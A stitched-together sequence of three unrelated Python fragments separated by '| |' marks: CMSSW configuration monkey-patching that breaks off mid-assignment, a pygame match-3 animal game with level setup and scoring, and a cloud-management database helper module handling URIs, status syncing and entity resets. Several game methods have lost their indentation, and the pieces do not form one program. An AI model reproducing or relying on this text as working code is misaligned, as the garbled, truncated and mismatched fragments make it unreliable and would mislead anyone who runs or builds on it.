cms._Parameterizable.old__delattr__ = cms._Parameterizable.__delattr__
cms._Parameterizable.__delattr__ = new_Parameterizeable_delattr
def new_Parameterizable_resetModified(self):
    # Clear this object's log, then recurse into nested parameterizables.
    self._isModified=False
    self._modifications = []
    for name in self.parameterNames_():
        param = self.__dict__[name]
        if isinstance(param, cms._Parameterizable):
            param.resetModified()
cms._Parameterizable.resetModified = new_Parameterizable_resetModified
def new_ParameterTypeBase_resetModified(self):
    # Leaf parameters: just clear the flag and the log.
    self._isModified=False
    self._modifications = []
cms._ParameterTypeBase.resetModified = new_ParameterTypeBase_resetModified
#### sequence history ####
def new__Sequenceable_name(self):
    # Default: a bare sequenceable has no printable name.
    return ''
cms._Sequenceable._name_ = new__Sequenceable_name
try:
    # for backwards-compatibility with CMSSW_3_10_X
    from FWCore.ParameterSet.SequenceTypes import _SequenceOperator
    def new__SequenceOperator_name(self):
        # e.g. "a+b"/"a*b": combine the operand names around the operator symbol.
        return str(self._left._name_())+str(self._pySymbol)+str(self._right._name_())
    _SequenceOperator._name_ = new__SequenceOperator_name
except ImportError:
    # Fixed: was a bare ``except:`` — only the failed import of the legacy
    # _SequenceOperator class should be tolerated here.
    pass
from FWCore.ParameterSet.SequenceTypes import _SequenceNegation, _SequenceIgnore, SequencePlaceholder
def new__SequencePlaceholder_name(self):
    # Placeholders already carry the name of the object they stand in for.
    return self._name
SequencePlaceholder._name_ = new__SequencePlaceholder_name
def new__SequenceNegation_name(self):
    # "~x" notation; "~()" if the operand is missing.
    if self._operand:
        return '~'+str(self._operand._name_())
    else:
        return '~()'
_SequenceNegation._name_ = new__SequenceNegation_name
def new__SequenceIgnore_name(self):
    # "-x" notation; "-()" if the operand is missing.
    if self._operand:
        return '-'+str(self._operand._name_())
    else:
        return '-()'
_SequenceIgnore._name_ = new__SequenceIgnore_name
def new_Sequence_name(self):
    # "(inner)" for a sequence with contents; "()" for an empty one.
    if self._seq:
        return '('+str(self._seq._name_())+')'
    else:
        return '()'
cms.Sequence._name_ = new_Sequence_name
def new__Module_name(self):
    # Prefer the label assigned in the process; fall back to the module's
    # declared type, then to the python class name.
    if hasattr(self,'_Labelable__label'):
        return getattr(self,'_Labelable__label')
    elif hasattr(self,'_TypedParameterizable__type'):
        return 'unnamed(%s)'%getattr(self,'_TypedParameterizable__type')
    return type(self).__name__
cms._Module._name_ = new__Module_name
def new__ModuleSequenceType__init__(self,*arg,**argv):
    # Attach the modification log before the original constructor runs.
    self._modifications = []
    self.old__init__(*arg,**argv)
cms._ModuleSequenceType.old__init__ = cms._ModuleSequenceType.__init__
cms._ModuleSequenceType.__init__ = new__ModuleSequenceType__init__
def new__ModuleSequenceType_resetModified(self):
    # Clear both the flag and the log.
    self._isModified=False
    self._modifications = []
cms._ModuleSequenceType.resetModified = new__ModuleSequenceType_resetModified
def new__ModuleSequenceType_isModified(self):
    return self._isModified
cms._ModuleSequenceType.isModified = new__ModuleSequenceType_isModified
def new__ModuleSequenceType_copy(self):
    # Copy that also carries over the modified flag and a deep copy of the log.
    returnValue = cms._ModuleSequenceType.__new__(type(self))
    returnValue.__init__(self._seq)
    returnValue._isModified = self._isModified
    returnValue._modifications = deepcopy(self._modifications)
    return returnValue
cms._ModuleSequenceType.copy = new__ModuleSequenceType_copy
def new__ModuleSequenceType_replace(self, original, replacement):
    # Record the replacement (with call-site file/line) and delegate to the
    # original implementation.
    stack = auto_inspect()
    self._isModified=True
    self._modifications.append({'file':stack[0][1],'line':stack[0][2],'action':'replace','old':original._name_(),'new':replacement._name_()})
    return self.old_replace(original, replacement)
cms._ModuleSequenceType.old_replace = cms._ModuleSequenceType.replace
cms._ModuleSequenceType.replace = | |
elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 2):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
self.change_right(i+2, j, 2)
elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 7
Sounds.eliminate(5) # Elimination sound 5
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
self.change_right(i+2, j, 3)
else:
self.animal_num[self.animal[i][j]] += 3
Sounds.eliminate(1) # Elimination sound 1
self.change_down(i, j, 3)
self.fall_animal()
score_level = self.score - score_level # Score level
# Display & speak: good, great, amazing, excellent, unbelievable
if score_level < 5:
return self.value_swapped
if score_level < 8: # 5 good
Sounds.score_level(0)
Element(Element.score_level[0], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 10: # 8 great
Sounds.score_level(1)
Element(Element.score_level[1], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 15: # 10 amazing
Sounds.score_level(2)
Element(Element.score_level[2], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 20: # 15 excellent
Sounds.score_level(3)
Element(Element.score_level[3], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level >= 20: # 20 unbelievable
Sounds.score_level(4)
Element(Element.score_level[4], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
return self.value_swapped # Return the swap value sign
    def fall_animal(self): # pylint: disable=too-many-locals
        '''Animation of falling animals: play the elimination animation on
        every cleared (-2) cell, break any ice beneath them, then slide the
        animals above down one row and refill the top with random ones.'''
        clock = pygame.time.Clock()
        position = []      # screen coords of every eliminated (-2) cell
        ice_position = []  # subset of those cells that sit on ice
        for i in range(self.row, self.row + self.height):
            for j in range(self.col, self.col + self.width):
                if self.animal[i][j] == -2:
                    x, y = self.rc_xy(i, j)
                    position.append((x, y))
                    if self.ice_list[i][j] == 1:
                        ice_position.append((x, y))
        # Play the 9-frame break/bling animation on every eliminated cell.
        if position:
            for index in range(0, 9):
                clock.tick(20)  # cap the animation at 20 fps
                for pos in position:
                    self.draw_brick(pos[0], pos[1])
                    if pos in ice_position:
                        Element(Element.ice_format%index, (pos[0], pos[1])).draw(self.screen)
                    Element(Element.bling_format%index, (pos[0], pos[1])).draw(self.screen)
                pygame.display.flip()
        # Refill the board row by row: cells above an eliminated one slide
        # down a step; a row-0 gap is refilled with a random animal (0..5).
        for i in range(self.row, self.row + self.height):
            brick_position = []
            fall_animal_list = []
            speed = [0, 1]
            for j in range(self.col, self.col + self.width):
                if self.animal[i][j] == -2:
                    x, y = self.rc_xy(i, j)
                    if self.ice_list[i][j] == 1:
                        play_sound(Sounds.ICE_BREAKING)
                        self.ice_num += 1
                        self.ice_list[i][j] = -1  # ice breaks exactly once
                    brick_position.append((x, y))
                    for m in range(i, self.row - 1, -1):
                        if self.animal[m - 1][j] != -1:
                            x, y = self.rc_xy(m - 1, j)
                            brick_position.append((x, y))
                            animal = Element(Element.animals[self.animal[m - 1][j]], (x, y))
                            fall_animal_list.append(animal)
                            self.animal[m][j] = self.animal[m - 1][j]
                        else:
                            self.animal[m][j] = randint(0, 5)
                            break
            # Animate the collected sprites until they report speed [0, 0].
            # NOTE(review): ``speed`` is taken from the *last* sprite on each
            # pass — presumably all sprites share the same speed; confirm.
            while speed != [0, 0] and fall_animal_list:
                for position in brick_position:
                    self.draw_brick(position[0], position[1])
                for animal_sprite in fall_animal_list:
                    animal_sprite.move(speed)
                    animal_sprite.draw(self.screen)
                    speed = animal_sprite.speed
                pygame.display.flip()
def judge_next(self, tp, score):
'''Check whether the next level is reached or not'''
if tp == 1: # Passed
self.load_fns_window(score)
elif tp == -1: # Failed
self.load_fail_window()
    def load_fail_window(self):
        '''Display the failure board and buttons'''
        sound_sign = 0  # ensures the board sound is played only once
        step_add = Board(Board.step_add, Board.button_position[0]) # L: 5 more steps
        retry = Board(Board.replay, Board.button_position[1]) # R: Replay
        self.screen.blit(self.fail_board.image, self.fail_board.rect) # Failure board
        self.screen.blit(step_add.image, step_add.rect)
        self.screen.blit(retry.image, retry.rect)
        # Slide the board in until its own speed drops to [0, 0].
        while self.fail_board.speed != [0, 0]:
            self.draw()
            self.screen.blit(self.fail_board.image, self.fail_board.rect)
            self.fail_board.move()
            pygame.display.flip()
            if sound_sign == 0:
                play_sound(Sounds.BOARD_SOUND)
                sound_sign = 1
def load_fns_window(self, score):
'''Display the success board, score and buttons'''
sound_sign = 0
replay = Board(Board.replay, Board.button_position[0]) # L: Replay
self.screen.blit(self.success_board.image, self.success_board.rect) # Successful board
if self.level < 10: # If not the last level
next_level = Board(Board.next, Board.button_position[1]) # R: Next level
self.screen.blit(next_level.image, next_level.rect)
self.screen.blit(replay.image, replay.rect)
while self.success_board.speed != [0, 0]:
self.draw()
self.screen.blit(self.success_board.image, self.success_board.rect)
self.success_board.move()
pygame.display.flip()
if sound_sign == 0:
play_sound(Sounds.BOARD_SOUND)
sound_sign = 1
self.displayStars(score) # Display the stars
# Money
self.load_text(str(self.score*2), (Board.starts_position[0][0]+75, Board.starts_position[0][0]+46), 20, (0, 0, 0))
    def displayStars(self, score):
        '''Display the stars according to the score.
        NOTE(review): camelCase name is inconsistent with the file's snake_case
        methods, but renaming would break callers.'''
        star1 = Board(Board.stars, Board.starts_position[0])
        star2 = Board(Board.stars, Board.starts_position[1])
        star3 = Board(Board.stars, Board.starts_position[2])
        if 0 <= score < self.min:
            # Below the first threshold: one star.
            self.load_text('1', (Board.starts_position[1][0]+48, Board.starts_position[1][1]+35), 20, (0, 0, 0))
            self.screen.blit(star1.image, star1.rect)
        elif self.min <= score <= self.max:
            # Between the thresholds: two stars.
            self.load_text('2', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
            self.screen.blit(star1.image, star1.rect)
            self.screen.blit(star2.image, star2.rect)
        elif score > self.max:
            # Above the top threshold: three stars.  NOTE(review): the label text
            # is '5', not '3' — looks like a typo, but might be an intentional
            # bonus value; confirm before changing.
            self.load_text('5', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
            self.screen.blit(star1.image, star1.rect)
            self.screen.blit(star2.image, star2.rect)
            self.screen.blit(star3.image, star3.rect)
        pygame.display.flip()
    def set_level_mode(self, level):
        '''Configure the board for `level`: size, blocked cells, ice and step budget.

        When a reset is pending (self.reset_mode), the game state is rebuilt
        via self.__init__ with a level-specific board size; blocked cells are
        marked with animal[...] = -1 and frozen cells with ice_list[...] = 1,
        and the step budget is set. Finally the per-level counters are cleared
        and 5 energy is deducted.
        '''
        self.level = level
        if self.reset_mode: # If it is required to reset the mode
            self.num_sign = True # Let num_add() award money/energy once for this level
            if level == 1:
                self.__init__(7, 7)
                # NOTE(review): these look like absolute board coordinates,
                # unlike levels 4+ which offset from self.row/self.col — confirm.
                self.animal[7][9] = self.animal[7][10] = self.animal[7][11] = self.animal[8][10] = self.animal[11][7] = \
                    self.animal[11][13] = self.animal[12][7] = self.animal[12][8] = self.animal[12][12] = self.animal[12][13] = \
                    self.animal[13][7] = self.animal[13][8] = self.animal[13][9] = self.animal[13][11] = self.animal[13][12] = \
                    self.animal[13][13] = -1
                self.init_step = 17 # 17 initial steps
            elif level == 2:
                self.__init__(4, 8)
                self.init_step = 16 # 16 initial steps
            elif level == 3:
                self.__init__(7, 7)
                self.init_step = 18 # 18 initial steps
            elif level == 4:
                self.__init__(9, 7)
                row, col = self.row, self.col
                # Block the corners and edge cells of the playfield.
                self.animal[row][col] = self.animal[row][col+7] = self.animal[row][col+8] = self.animal[row+1][col+8] = \
                    self.animal[row+5][col] = self.animal[row+6][col] = self.animal[row+6][col+1] = self.animal[row+6][col+8] = -1
                self.init_step = 20
            elif level == 5:
                self.__init__(8, 9)
                row, col = self.row, self.col
                self.animal[row][col+7] = self.animal[row+2][col] = self.animal[row+5][col] = self.animal[row+3][col+7] = \
                    self.animal[row+6][col+7] = self.animal[row+8][col] = -1
                self.init_step = 20
            elif level == 6:
                self.__init__(9, 9)
                row, col = self.row, self.col
                self.animal[row][col] = self.animal[row][col+8] = self.animal[row+2][col+4] = self.animal[row+3][col+2] = \
                    self.animal[row+3][col+6] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
                # Block a 2x3 rectangle in the middle of the board.
                for i in range(row+4, row+6):
                    for j in range(col+3, col+6):
                        self.animal[i][j] = -1
                self.init_step = 28
            elif level == 7:
                self.__init__(9, 9)
                row, col = self.row, self.col
                # Blocked cells form an S-shaped wall: a full central column
                # plus two half-rows on opposite sides.
                for i in range(row, row + 9):
                    self.animal[i][col+4] = -1
                for j in range(col, col+4):
                    self.animal[row+3][j] = -1
                for j in range(col+5, col+9):
                    self.animal[row+5][j] = -1
                self.init_step = 25
            elif level == 8:
                self.__init__(7, 8)
                row, col = self.row, self.col
                # First ice level: a 3x5 frozen rectangle.
                for i in range(row+2, row+5):
                    for j in range(col+1, col+6):
                        self.ice_list[i][j] = 1
                self.init_step = 21
            elif level == 9:
                self.__init__(9, 9)
                row, col = self.row, self.col
                # Blocked edge midpoints plus a fully frozen 7x7 interior.
                self.animal[row][col+4] = self.animal[row+4][col] = self.animal[row+4][col+8] = self.animal[row+8][col+4] = -1
                for i in range(row+1, row+8):
                    for j in range(col+1, col+8):
                        self.ice_list[i][j] = 1
                self.init_step = 35
            else:
                # Level 10 (final): blocked top band with a few random animals
                # re-seeded into it, scattered blocked columns, and a large
                # frozen region at the bottom.
                self.__init__(9, 9)
                row, col = self.row, self.col
                for i in range(row, row+2):
                    for j in range(col, col+9):
                        self.animal[i][j] = -1
                self.animal[row][col+4] = randint(0, 5)
                self.animal[row+1][col+2] = randint(0, 5)
                self.animal[row+1][col+4] = randint(0, 5)
                self.animal[row+1][col+6] = randint(0, 5)
                self.animal[row+2][col+1] = self.animal[row+3][col+1] = self.animal[row+2][col+3] = self.animal[row+3][col+3] =\
                    self.animal[row+2][col+5] = self.animal[row+3][col+5] = self.animal[row+2][col+7] = \
                    self.animal[row+3][col+7] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
                for i in range(row+4, row+8):
                    for j in range(col, col+9):
                        self.ice_list[i][j] = 1
                self.ice_list[row+2][col+4] = self.ice_list[row+3][col+2] = self.ice_list[row+3][col+4] = \
                    self.ice_list[row+3][col+6] = 1
                self.init_step = 40
        # Per-level state reset runs regardless of reset_mode; entering a
        # level always costs 5 energy.
        self.type = 0
        self.energy_num -= 5
        self.success_board = Board(Board.success, [200, 0]) # Success board
        self.fail_board = Board(Board.fail, [200, 0]) # Failure board
        self.step = self.init_step
        self.score = 0
        self.animal_num = [0, 0, 0, 0, 0, 0]
        self.ice_num = 0
        self.reset_mode = False
def num_add(self):
'''Add to score'''
if self.num_sign:
self.money += self.score * 2
if self.score < self.min:
self.energy_num += 1
elif self.score < self.max:
self.energy_num += 2
else:
self.energy_num += 5
self.num_sign = False
def judge_level(self):
'''Check whether the level was passed'''
if self.step <= 0:
self.type = -1 # Game over
if self.level == 1:
if self.animal_num[4] >= 10: # L1: 10 frogs
self.type = 1 # Level 1 passed
self.num_add()
elif self.level == 2:
if self.animal_num[1] >= 21: # L2: 21 bears
self.type = 1 # Level 2 passed
self.num_add()
elif self.level == 3:
if self.animal_num[4] >= 16 and self.animal_num[5] >= 16: # L3: 16 frogs and 16 cows
self.type = 1 # Level 3 passed
self.num_add()
elif self.level == 4:
if self.animal_num[5] >= 18 and self.animal_num[2] >= 18: # L4: 18 cows and 18 chicks
self.type = 1 # Level 4 passed
self.num_add()
elif self.level == 5:
if self.animal_num[2] >= 28 and self.animal_num[0] >= 28: # L5: 28 chicks and 28 foxes
self.type = 1 # Level 5 passed
self.num_add()
elif self.level == 6:
if self.animal_num[4] >= 70: # L6: 70 frogs
self.type = 1 # Level 6 passed
self.num_add()
elif self.level == 7:
if self.animal_num[2] >= 36 and self.animal_num[1] >= 36 and self.animal_num[0] >= 36: # L7: 36 chickens, 36 bears and 36 foxes
self.type = 1 # Level 7 passed
self.num_add()
elif self.level == 8:
if self.ice_num >= 15: # L8: 15 ice
self.type = 1 # Level 8 passed
self.num_add()
elif self.level == 9:
if self.ice_num >= 49: # L9: 49 ice
self.type = 1 # | |
if not db_row:
return
if db_row["entitytype"] == "server":
create_or_update_server_details(db, dbid, rest, slice_dbid)
elif db_row["entitytype"] == "serverfarm":
create_or_update_serverfarm_details(db, dbid, rest)
elif db_row["entitytype"] == "compute_network_service":
create_or_update_compute_details(db, dbid, rest)
elif db_row["entitysubtype"] == "network_service":
create_or_update_service_details(db, dbid, rest, slice_dbid)
elif db_row["entitytype"] == "container":
create_or_update_container_details(db, dbid, rest, slice_dbid)
elif db_row["entitytype"] == "volume":
create_or_update_volume_details(db, dbid, rest, slice_dbid)
# REST payload key -> (group name key in payload, group entitytype, child entitytype)
# for the four attached-group kinds whose per-child status is mirrored into
# tblAttachedEntitiesStatus by create_or_update_uri().
_ATTACHED_GROUP_SPECS = (
    ("firewall", "security_group", "security_group", "security_rule"),
    ("vpn", "vpn_group", "vpn_group", "vpn_connection"),
    ("load_balancer", "lbs_group", "lbs_group", "lbs_service"),
    ("acl", "access_group", "acl_group", "acl_rule"),
)


def _sync_attached_group_status(db, db_row, dbid, vdc_row, groups, name_key,
                                group_entitytype, child_entitytype):
    """Mirror each group's child status entries into tblAttachedEntitiesStatus.

    :param groups: list of group dicts from the REST payload; each may carry a
        ``status`` list of child entries with ``name``/``entity_state``/``details``
    :param name_key: payload key holding the group's name (e.g. ``security_group``)
    :param group_entitytype: tblEntities entitytype of the group row
    :param child_entitytype: tblEntities entitytype of the child rows

    Groups or children with no matching live tblEntities row are skipped.
    Note: ``details`` is popped from the payload entry as a side effect,
    matching the original inline code.
    """
    for cfd_group in groups:
        group_row = cloud_utils.lower_key(
            db.get_row_dict("tblEntities", {"parententityid": vdc_row["id"],
                                            "entitytype": group_entitytype,
                                            "deleted": 0,
                                            "name": cfd_group[name_key]},
                            order="ORDER BY id LIMIT 1"))
        if not group_row:
            continue
        if "status" in cfd_group and isinstance(cfd_group["status"], list):
            for cfd_child in cfd_group["status"]:
                child_row = cloud_utils.lower_key(
                    db.get_row_dict("tblEntities", {"parententityid": group_row["id"],
                                                    "entitytype": child_entitytype,
                                                    "deleted": 0,
                                                    "name": cfd_child["name"]},
                                    order="ORDER BY id LIMIT 1"))
                if not child_row:
                    continue
                # The lookup key identifies the (vdc, group, child, service, port)
                # tuple; the update adds the current status on top of it.
                key = {"vdcentityid": vdc_row["id"],
                       "childentityid": child_row["id"],
                       "groupentityid": group_row["id"],
                       "serviceentityid": db_row["parententityid"],
                       "portentityid": dbid}
                update = dict(key)
                update["entitystatus"] = cfd_child["entity_state"]
                update["details"] = cfd_child.pop("details", "")
                cloud_utils.update_or_insert(db, "tblAttachedEntitiesStatus", update, key)


def create_or_update_uri(db, db_row, dbid, slice_uri, rest, slice_dbid=0, uri_type="home", vdc_row=None):
    """Create or refresh the tblUris row for entity *dbid* from a REST payload.

    :param db_row: the entity's tblEntities row (may be falsy)
    :param slice_uri: base URI of the owning slice, prefixed onto relative URIs
    :param rest: REST response dict; must carry a truthy ``uri`` to be processed
    :param uri_type: which URI slot to update (default ``home``)
    :param vdc_row: owning VDC row; required for the attached-group status sync

    For ``home`` URIs the full payload is stored as ``rest_response`` (with
    ``novnc_url`` rewritten for the user) and entity details are refreshed.
    When the payload carries firewall/vpn/load_balancer/acl group lists and a
    VDC row is given, their per-child statuses are mirrored into
    tblAttachedEntitiesStatus. All errors are logged and swallowed, matching
    the module's best-effort style.
    """
    try:
        if "uri" in rest and rest["uri"]:
            update = {"tblEntities": dbid, "tblSlices": slice_dbid, "type": uri_type}
            # Physical entities keep their existing URI; everything else gets
            # the slice-prefixed one from the payload.
            if not db_row or db_row["entitytype"] not in entity_constants.physical_entitytypes:
                update["uri"] = slice_uri + rest["uri"]
            if uri_type == "home":
                if "novnc_url" in rest:
                    rest["novnc_url"] = cloud_utils.update_user_url(rest["novnc_url"], slice_uri)
                update["rest_response"] = json.dumps(rest)
                create_or_update_entity_details(db, db_row, dbid, rest, slice_dbid=slice_dbid)
            # "traffic_stats" intentionally wins over "statistics" when both exist.
            if "statistics" in rest:
                update["statistics"] = slice_uri + rest["statistics"]
            if "traffic_stats" in rest:
                update["statistics"] = slice_uri + rest["traffic_stats"]
            cloud_utils.update_or_insert(db, "tblUris", update,
                                         {"tblEntities": dbid, "tblSlices": slice_dbid, "type": uri_type})
            # The four group kinds were previously four near-identical inline
            # copies; they differ only in the spec tuple values.
            for rest_key, name_key, group_type, child_type in _ATTACHED_GROUP_SPECS:
                if rest_key in rest and isinstance(rest[rest_key], list) and vdc_row:
                    _sync_attached_group_status(db, db_row, dbid, vdc_row, rest[rest_key],
                                                name_key, group_type, child_type)
        else:
            LOG.warn(_("URI missing in rest: %s for dbid: %s for uri_type: %s" % (rest, dbid, uri_type)))
    except:
        cloud_utils.log_exception(sys.exc_info())
def update_only_uri(db, db_row, dbid, rest, entity_url, uri_type="home"):
    """Refresh an existing tblUris row for *dbid* without inserting a new one.

    For ``home`` URIs the payload's ``novnc_url`` is rewritten against
    *entity_url* and the whole payload stored as ``rest_response``. Payloads
    with no truthy ``uri`` are logged and skipped; any error is logged and
    swallowed.
    """
    try:
        if not ("uri" in rest and rest["uri"]):
            LOG.warn(_("URI missing in rest: %s for dbid: %s for uri_type: %s" % (rest, dbid, uri_type)))
            return
        changes = {"tblEntities": dbid, "type": uri_type}
        if uri_type == "home":
            if "novnc_url" in rest:
                rest["novnc_url"] = cloud_utils.update_user_url(rest["novnc_url"], entity_url)
            changes["rest_response"] = json.dumps(rest)
        cloud_utils.update_only(db, "tblUris", changes, {"tblEntities": dbid, "type": uri_type})
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_service(db, dbid):
    """Yield each network-service child of *dbid*, in topology order.

    Entity types not registered in entity_manager are skipped. Errors are
    logged and end the generator, per the module's best-effort style.
    """
    try:
        for service_type in entity_constants.topology_network_services:
            if service_type not in entity_manager.entities:
                continue
            child_table = entity_manager.entities[service_type].child_table
            for service in cloud_utils.entity_children(db, dbid, service_type, child_table):
                yield service
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_vdc_service(db, dbid):
    """Yield each network-service child entity of VDC *dbid*, keys lower-cased.

    Rows are walked in ascending id order, one query per row. Errors are
    logged and end the generator.

    Fix: the original had a stray ``yield service`` after the if/else inside
    the loop, which re-yielded every row a second time with its raw
    (non-lower-cased) keys — no sibling generator in this module does that.
    """
    try:
        current_index = 0
        while True:
            service = db.get_row("tblEntities",
                                 "parententityid = '%s' AND entitysubtype='network_service' AND id > '%s'" % (
                                     dbid, current_index),
                                 order="ORDER BY id LIMIT 1")
            if not service:
                break
            current_index = service['id']
            yield cloud_utils.lower_key(service)
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_vdc_interface(db, dbid):
    """Yield every network_interface member attached to entity *dbid*."""
    try:
        child_table = entity_manager.entities["network_interface"].child_table
        for member in cloud_utils.entity_members(db, dbid, "network_interface", child_table=child_table):
            yield member
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_service_port(db, dbid):
    """Yield every service_port member attached to entity *dbid*."""
    try:
        child_table = entity_manager.entities["service_port"].child_table
        for member in cloud_utils.entity_members(db, dbid, "service_port", child_table=child_table):
            yield member
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_vdc_group(db, dbid):
    """Yield every profile-group member of *dbid*, following provisioning order.

    Profile groups not registered in entity_manager are skipped.
    """
    try:
        for profile in entity_constants.profile_groups_provision_order:
            group_type = profile["group"]
            if group_type not in entity_manager.entities:
                continue
            child_table = entity_manager.entities[group_type].child_table
            for member in cloud_utils.entity_members(db, dbid, group_type, child_table=child_table):
                yield member
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_group(db, dbid, group=entity_constants.profile_groups_provision_order):
    # Yield every profile-group member of entity `dbid` (and optionally each
    # profile's child members), following the given provisioning order.
    #
    # NOTE(review): the inner `for group in ...` loop variable shadows the
    # `group` parameter, and the `if profile["child"]` block sits OUTSIDE that
    # loop — so it runs once per profile using whatever `group` last referred
    # to. If a profile type yields no members, `group["id"]` fails (on the
    # first profile it would index the parameter list), which the bare except
    # silently logs and the generator stops. Confirm whether the child loop
    # was meant to be nested inside the member loop; left as-is because
    # callers may depend on the current yield order.
    try:
        for profile in group:
            if profile["group"] in entity_manager.entities:
                for group in cloud_utils.entity_members(db, dbid, profile["group"], child_table=entity_manager.entities[
                    profile["group"]].child_table):
                    yield group
            if profile["child"] and profile["child"] in entity_manager.entities:
                for child in cloud_utils.entity_members(db, group["id"], profile["child"],
                                                        child_table=entity_manager.entities[
                                                            profile["child"]].child_table):
                    yield child
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_entity_row_dict(db, where):
    """Return the first tblEntities row matching *where*, merged with its
    child-table row, with all keys lower-cased.

    The child row's ``id`` is renamed to ``child_id`` so it does not clobber
    the entity id. Returns None when no entity matches, or on any error
    (errors are logged) — including when the entity has no child row, since
    the membership test on a missing row raises and is caught.
    """
    try:
        primary_row = db.get_row_dict("tblEntities", where, order="ORDER BY id LIMIT 1")
        if not primary_row:
            return None
        child_table = entity_manager.entities[primary_row["EntityType"]].child_table
        crow = db.get_row(child_table, "tblEntities='%s' " % primary_row['id'],
                          order="ORDER BY id LIMIT 1")
        if "id" in crow:
            crow["child_id"] = crow.pop("id")
        primary_row.update(crow)
        return cloud_utils.lower_key(primary_row)
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_entity_row(db, where):
    """Yield each tblEntities row matching *where* in ascending id order,
    merged with its child-table row (child ``id`` renamed ``child_id``),
    keys lower-cased. Errors are logged and end the generator.
    """
    try:
        last_id = 0
        while True:
            row = db.get_row("tblEntities", " %s AND id > %s " % (where, last_id),
                             order="ORDER BY id LIMIT 1")
            if not row:
                return
            last_id = row["id"]
            child_table = entity_manager.entities[row["EntityType"]].child_table
            if child_table:
                child = db.get_row(child_table, "tblEntities='%s' " % row['id'],
                                   order="ORDER BY id LIMIT 1")
                if "id" in child:
                    child["child_id"] = child.pop("id")
                row.update(child)
            yield cloud_utils.lower_key(row)
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error for where: %s" % where))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_entity_attached(db, dbid):
    """Yield each tblAttachedEntities row owned by entity *dbid*, keys
    lower-cased, in ascending id order."""
    try:
        last_id = 0
        while True:
            row = cloud_utils.lower_key(
                db.get_row("tblAttachedEntities",
                           "tblEntities = '%s' AND id > '%s'" % (dbid, last_id),
                           order="ORDER BY id LIMIT 1"))
            if not row:
                break
            last_id = row["id"]
            yield row
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error"))
    except:
        cloud_utils.log_exception(sys.exc_info())
def get_next_attached_parent_entity(db, dbid, entitytype=None):
    """Yield the tblEntities row (keys lower-cased) of each parent that
    *dbid* is attached to, optionally filtered by *entitytype*."""
    for attachment in get_next_attached_parent(db, dbid, entitytype):
        parent = db.get_row_dict("tblEntities", {"id": attachment["tblentities"]},
                                 order="ORDER BY id LIMIT 1")
        yield cloud_utils.lower_key(parent)
def get_next_attached_parent(db, dbid, entitytype=None):
    """Yield tblAttachedEntities rows whose AttachedEntityId is *dbid*, keys
    lower-cased, in ascending id order, optionally filtered by entitytype."""
    try:
        type_filter = "AND entitytype = '%s' " % entitytype if entitytype else ""
        last_id = 0
        while True:
            row = cloud_utils.lower_key(
                db.get_row("tblAttachedEntities",
                           "AttachedEntityId = '%s' AND id > %s %s " % (dbid, last_id, type_filter),
                           order="ORDER BY id LIMIT 1"))
            if not row:
                break
            last_id = row["id"]
            yield row
    except GeneratorExit:
        LOG.info(_("Ignoring Generator Error"))
    except:
        cloud_utils.log_exception(sys.exc_info())
def set_entity_mode(db, dbid, mode):
    # Set EntityMode on a live (deleted=0) entity and bump updated_at.
    # NOTE(review): values are interpolated directly into the SQL string —
    # safe only while dbid/mode come from trusted code paths; confirm callers
    # never pass user-controlled strings.
    db.execute_db("UPDATE tblEntities SET EntityMode = '%s', updated_at=now() "
                  "WHERE (id='%s' AND deleted=0)" % (mode, dbid))
def reset_status_and_uri(db, dbid, status):
    # Force both EntityStatus and EntityMode to `status`, clear the bridge id,
    # and soft-delete the entity's URIs and detail rows.
    # NOTE(review): raw string interpolation into SQL — trusted callers only.
    db.execute_db("UPDATE tblEntities SET EntityStatus = '%s', EntityMode = '%s', updated_at=now(), EntityBridgeId=0 "
                  "WHERE (id='%s' AND deleted=0)" % (status, status, dbid))
    db.execute_db("UPDATE tblUris SET deleted = 1, deleted_at=now() "
                  "WHERE (tblEntities='%s' AND deleted=0)" % dbid)
    db.execute_db("UPDATE tblEntityDetails SET deleted = 1, deleted_at=now() "
                  "WHERE (tblEntities='%s' AND deleted=0)" % dbid)
def reset_vdc_entities(db, dbid):
    """Return a VDC and everything under it to the 'Ready' state.

    Clears compute/network resource accounting, resets every profile group
    (walked in deprovision order) and every network service, deletes their
    physical attachments, resets all directly attached network interfaces and
    finally the VDC row itself, then purges the VDC's attached-status rows.
    All errors are logged and swallowed.
    """
    try:
        entity = cloud_utils.lower_key(
            db.get_row_dict("tblEntities", {"id": dbid}, order="ORDER BY id LIMIT 1"))
        reset_compute_resources(db, entity)
        reset_network_resources(db, entity)
        # db.update_db(
